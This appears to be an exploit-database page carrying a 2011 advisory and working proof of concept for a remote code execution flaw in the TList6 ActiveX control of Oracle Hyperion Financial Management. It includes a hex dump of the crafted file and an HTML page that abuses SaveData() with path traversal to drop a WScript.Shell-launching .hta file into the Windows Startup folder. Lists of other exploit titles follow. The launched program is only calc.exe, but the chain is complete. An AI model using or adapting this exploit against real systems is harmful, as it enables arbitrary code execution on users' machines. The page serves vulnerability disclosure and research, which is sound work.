Menu

Search for hundreds of thousands of exploits

"Oracle Hyperion Financial Management TList6 - ActiveX Control Remote Code Execution"

Author

Exploit author

rgod

Platform

Exploit platform

windows

Release date

Exploit published date

2011-11-02

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
Oracle Hyperion Financial Management TList6 ActiveX 
Control Remote Code Execution Vulnerability

tested against: Internet Explorer 8
                Microsoft Windows Server 2003 r2 sp2

download url:
http://www.oracle.com/technetwork/middleware/epm/downloads/index.html

files tested:
SystemInstaller-11121-win32.zip
FoundationServices-11121-win32-Part1.zip
FoundationServices-11121-win32-Part2.zip
FoundationServices-11121-win32-Part3.zip
FoundationServices-11121-win32-Part4.zip
FoundationServices-11121-Part5.zip
FoundationServices-11121-Part6.zip
FoundationServices-11121-Part7.zip
StaticContent-11121.zip
RandAFoundation-11121.zip
EPM_Architect-11121.zip
HyperionFinancialManagement-11121.zip

Background:

the mentioned program installs an ActiveX control with the following
settings:

Binary Path: C:\WINDOWS\system32\TList6.ocx
ProgID: TList.TList.6
CLSID: {65996200-3B87-11D4-A21F-00E029189826}
Safe for Initialization (Registry): True
Safe for Scripting (Registry): True

This control is marked "safe for scripting" and "safe for initialization",
Internet Explorer will allows scripting of this control.


Vulnerability:

The mentioned class contains the vulnerable SaveData() method, see typelib:

...
	/* DISPID=167 */
	/* VT_I2 [2] */
	function SaveData(
		/* VT_BSTR [8]  */ $lpszFileName 
		)
	{
	}
...

which allows to create / overwrite files with arbitrary extensions
inside arbitrary locations ex. automatic startup folders. By manipulating 
ex. the Caption property is possible to create a valid application 
with .hta extension.

The resulting file will look like this:

0000  00 62 99 65 87 3b d4 11  a2 1f 00 e0 29 18 98 26   .be;Ô. ¢..à).˜&
0010  09 00 06 00 ac 14 00 00  ac 14 00 00 e4 00 00 00   ....¬... ¬...ä...
0020  00 03 52 e3 0b 91 8f ce  11 9d e3 00 aa 00 4b b8   ...‘Î .ã.ª.K¸
0030  51 01 00 00 00 90 01 c0  d4 01 00 0f 54 69 6d 65   Q.....À Ô...Time
0040  73 20 4e 65 77 20 52 6f  6d 61 6e 01 00 01 01 00   s New Ro man.....
0050  08 00 00 80 05 00 00 80  0e 00 00 80 0d 00 00 80   ...... ......
0060  2c 01 00 00 e1 00 00 00  e1 00 00 00 f1 ff ff ff   ,...á... á...ñÿÿÿ
0070  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ........ ........
0080  00 00 00 00 00 00 00 00  01 5c 61 3e 3e 3e 3e 3e   ........ .\a>>>>>
0090  3e 3e 3e 3e 3e 3e 3e 3e  3e 3e 3e 3e 3c 53 43 52   >>>>>>>> >>>><SCR
00a0  49 50 54 3e 20 76 61 72  20 78 3d 6e 65 77 20 41   IPT> var  x=new A
00b0  63 74 69 76 65 58 4f 62  6a 65 63 74 28 22 57 53   ctiveXOb ject("WS
00c0  63 72 69 70 74 2e 53 68  65 6c 6c 22 29 3b 20 78   cript.Sh ell"); x
00d0  2e 45 78 65 63 28 22 43  41 4c 43 2e 45 58 45 22   .Exec("C ALC.EXE"
00e0  29 3b 20 3c 2f 53 43 52  49 50 54 3e 00 01 01 01   ); </SCR IPT>....
00f0  03 00 ff ff ff ff ff ff  ff ff 00 01 00 01 00 00   ..ÿÿÿÿÿÿ ÿÿ......
0100  00 00 00 00 00 00 00 00  00 00 01 00 01 00 00 00   ........ ........
0110  01 00 00 00 00 00 03 00  01 00 00 00 ff 00 00 00   ........ ....ÿ...
0120  00 00 00 08 00 00 80 01  00 00 00 00 00 00 00 00   ....... ........
0130  00 17 00 00 80 18 00 00  80 00 00 00 00 01 00 1a   ....... .......
0140  62 99 65 87 3b d4 11 a2  1f 00 e0 29 18 98 26 44   be;Ô.¢ ..à).˜&D
0150  55 02 00 00 00 12 00 06  00 0b 00 02 00 00 00 00   U....... ........
0160  00 00 04 00 03 00 00 60  ab 4e 06 10 00 00 00 5f   .......` «N....._
0170  5f 4f 62 73 6f 6c 65 74  65 56 61 6c 75 65 00 00   _Obsolet eValue..
0180  00 00 00 00 00 00 00 00  60 ab 4e 06 00 00 00 00   ........ N.....
0190  01 4d 4b 10 00 00 00 00  00 01 00 00 00 02 00 00   .MK..... ........
01a0  00 03 00 00 00 04 00 00  00 05 00 00 00 06 00 00   ........ ........
01b0  00 07 00 00 00 08 00 00  00 09 00 00 00 0a 00 00   ........ ........
01c0  00 0b 00 00 00 0c 00 00  00 0d 00 00 00 0e 00 00   ........ ........
01d0  00 0f 00 00 00 00 00 ff  00 00 ff ff ff 00 00 00   .......ÿ ..ÿÿÿ...
01e0  ff 00 00 00 00 00 00 05  00 00 00 02 00 00 00 00   ÿ....... ........
01f0  00 01 00 00 c0 c0 c0 22  00 00 08 00 00 00 09 00   ....ÀÀÀ" ........
0200  01 00 00 80 bf ff 31 00  00 00 8a e3 aa 2b 84 ee   ...€¿ÿ1. ..Šãª+î
0210  e5 a0 2b 84 a8 ac a0 0c  00 00 00 35 35 32 58 58   å +„¨¬ . ...552XX
0220  58 58 58 44 45 4d 4f 08  00 00 00 4a 6f 68 6e 20   XXXDEMO. ...John 
0230  44 6f 65 1e 00 01 00 00  00 00 40 00 00 ff ff ff   Doe..... ..@..ÿÿÿ
0240  00 90 01 00 00 02 00 d7  00 00 00 44 55 06 00 00   ......× ...DU...
0250  00 12 00 06 00 0b 00 06  00 00 00 f8 8f 50 04 10   ........ ...øP..
0260  00 00 00 5f 5f 49 6e 6e  65 72 50 69 63 41 6c 69   ...__Inn erPicAli
0270  67 6e 00 03 00 05 00 00  00 00 10 58 66 04 13 00   gn...... ...Xf...
0280  00 00 5f 5f 49 6e 6e 65  72 42 6f 72 64 65 72 43   ..__Inne rBorderC
0290  6f 6c 6f 72 00 03 00 00  00 00 00 00 20 b5 56 08   olor.... .... µV.
02a0  13 00 00 00 5f 5f 49 6e  6e 65 72 42 6f 72 64 65   ....__In nerBorde
02b0  72 53 74 79 6c 65 00 03  00 00 00 00 00 00 30 f4   rStyle.. ......0ô
02c0  60 08 11 00 00 00 5f 5f  49 6e 6e 65 72 42 61 63   `.....__ InnerBac
02d0  6b 43 6f 6c 6f 72 00 03  00 c0 c0 c0 02 00 b8 c1   kColor.. .ÀÀÀ..¸Á
02e0  33 0d 11 00 00 00 5f 5f  49 6e 6e 65 72 54 65 78   3.....__ InnerTex
02f0  74 41 6c 69 67 6e 00 03  00 02 00 00 00 00 b8 54   tAlign.. ......¸T
0300  6d 0d 11 00 00 00 5f 5f  49 6e 6e 65 72 41 6c 69   m.....__ InnerAli
0310  67 6e 6d 65 6e 74 00 03  00 00 00 00 00 00 2e 00   gnment.. ........
0320  00 00                                              ..

proof of concept code which launches calc.exe at the next 
startup:

http://retrogod.altervista.org/9sg_ohfm_poc.html

<!--
Oracle Hyperion Financial Management 11.1.2.1.0
TList6.ocx ActiveX Control Remote Code Execution Vulnerability PoC

tested against Internet Explorer 8
Microsoft Windows 2003 r2 sp2

Binary Path: C:\WINDOWS\system32\TList6.ocx
ProgID: TList.TList.6
CLSID: {65996200-3B87-11D4-A21F-00E029189826}
Safe for Initialization (Registry): True
Safe for Scripting (Registry): True

rgod
-->
<!-- saved from url=(0014)about:internet --> 
<html>
<object classid='clsid:65996200-3B87-11D4-A21F-00E029189826' id='obj' />
</object>
<script>
obj.Caption = ">>>>>>>>>>>>>>>>><" + "SCRIPT> var x=new ActiveXObject(\"WScript.Shell\"); x.Exec(\"CALC.EXE\"); <" +"/SCRIPT>";
obj.SaveData("..\\..\\..\\..\\..\\..\\..\\..\\..\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\suntzu.hta");
</script>
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS" webapps windows "Amin Rawah"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-01 "Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path" local windows "Emmanuel Lujan"
2020-12-01 "Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path" local windows Jok3r
2020-12-01 "Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path" local windows "Metin Yunus Kandemir"
2020-12-01 "10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)" local windows Sectechs
2020-12-01 "EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path" local windows SamAlucard
2020-11-30 "YATinyWinFTP - Denial of Service (PoC)" remote windows strider
Release Date Title Type Platform Author
2013-12-11 "EMC Data Protection Advisor DPA Illuminator - EJBInvokerServlet Remote Code Execution" remote windows rgod
2013-10-04 "Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object - Remote Code Execution" remote php rgod
2013-05-26 "SIEMENS Solid Edge ST4/ST5 SEListCtrlX - ActiveX SetItemReadOnly Arbitrary Memory Rewrite Remote Code Execution" dos windows rgod
2013-05-26 "SIEMENS Solid Edge ST4/ST5 WebPartHelper - ActiveX RFMSsvs!JShellExecuteEx Remote Code Execution" remote windows rgod
2013-01-07 "Foxit Reader 5.4.4.1128 Firefox Plugin - 'npFoxitReaderPlugin.dll' Stack Buffer Overflow (PoC)" dos windows rgod
2012-11-15 "Novell NetIQ Privileged User Manager 2.3.1 - 'ldapagnt.dll' ldapagnt_eval() Perl Code Evaluation Remote Code Execution" remote windows rgod
2012-11-15 "Novell NetIQ Privileged User Manager 2.3.1 - 'auth.dll' pa_modify_accounts() Remote Code Execution" remote windows rgod
2012-08-07 "Oracle Business Transaction Management Server 12.1.0.2.7 - FlashTunnelService WriteToFile Message Remote Code Execution" remote windows rgod
2012-08-07 "Oracle Business Transaction Management Server 12.1.0.2.7 FlashTunnelService - Remote File Deletion" remote windows rgod
2012-08-06 "AOL Products downloadUpdater2 Plugin - 'SRC' Remote Code Execution" dos windows rgod
2012-05-11 "Adobe Photoshop CS5.1 - U3D.8BI Collada Asset Elements Stack Overflow" local windows rgod
2012-04-30 "McAfee Virtual Technician 6.3.0.1911 MVT.MVTControl.6300 - ActiveX 'GetObject()' Code Execution" remote windows rgod
2012-04-05 "Quest Toad for Oracle Explain Plan Display ActiveX Control - 'QExplain2.dll 6.6.1.1115' Remote File Creation / Overwrite" remote windows rgod
2012-04-05 "Quest vWorkspace 7.5 Connection Broker Client - ActiveX Control 'pnllmcli.dll 7.5.304.547' SaveMiniLaunchFile() Method Remote File Creation / Overwrite" remote windows rgod
2012-03-28 "Quest InTrust 10.4.x - Annotation Objects ActiveX Control 'AnnotateX.dll' Uninitialized Pointer Remote Code Execution" remote windows rgod
2012-03-28 "D-Link DCS-5605 Network Surveillance - ActiveX Control 'DcsCliCtrl.dll' lstrcpyW Remote Buffer Overflow" remote hardware rgod
2012-03-28 "Quest InTrust 10.4.x - ReportTree / SimpleTree Classes" remote windows rgod
2012-03-28 "TRENDnet SecurView TV-IP121WN Wireless Internet Camera - UltraMJCam ActiveX Control OpenFileDlg WideCharToMultiByte Remote Stack Buffer Overflow" remote hardware rgod
2012-03-22 "Cisco Linksys WVC200 Wireless-G PTZ Internet Video Camera PlayerPT - ActiveX Control PlayerPT.ocx sprintf Buffer Overflow (PoC)" dos windows rgod
2012-03-22 "Google Talk - 'gtalk://' Deprecated URI Handler Injection" remote windows rgod
2012-03-19 "LANDesk Lenovo ThinkManagement Suite 9.0.3 Core Server - Arbitrary File Deletion" remote windows rgod
2012-03-19 "2X Client for RDP 10.1.1204 - ClientSystem Class ActiveX Control Download and Execute" remote windows rgod
2012-03-19 "Dell Webcam Software Bundled - ActiveX Remote Buffer Overflow" remote windows rgod
2012-03-19 "LANDesk Lenovo ThinkManagement Suite 9.0.3 - Core Server Remote Code Execution" remote windows rgod
2012-03-19 "2X ApplicationServer 10.1 - TuxSystem Class ActiveX Control Remote File Overwrite" remote windows rgod
2012-03-19 "ManageEngine DeviceExpert 5.6 Java Server ScheduleResultViewer servlet - Directory Traversal" webapps jsp rgod
2011-11-07 "Oracle Hyperion Strategic Finance 12.x - Tidestone Formula One WorkBook OLE Control TTF16.ocx Remote Heap Overflow" remote windows rgod
2011-11-02 "Oracle Hyperion Financial Management TList6 - ActiveX Control Remote Code Execution" remote windows rgod
2011-10-31 "Oracle DataDirect ODBC Drivers - HOST Attribute 'arsqls24.dll' Stack Buffer Overflow (PoC)" dos windows rgod
2011-10-24 "Oracle AutoVue 20.0.1 - 'AutoVueX.ocx' ActiveX Control 'ExportEdaBom()' Insecure Method" remote windows rgod 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected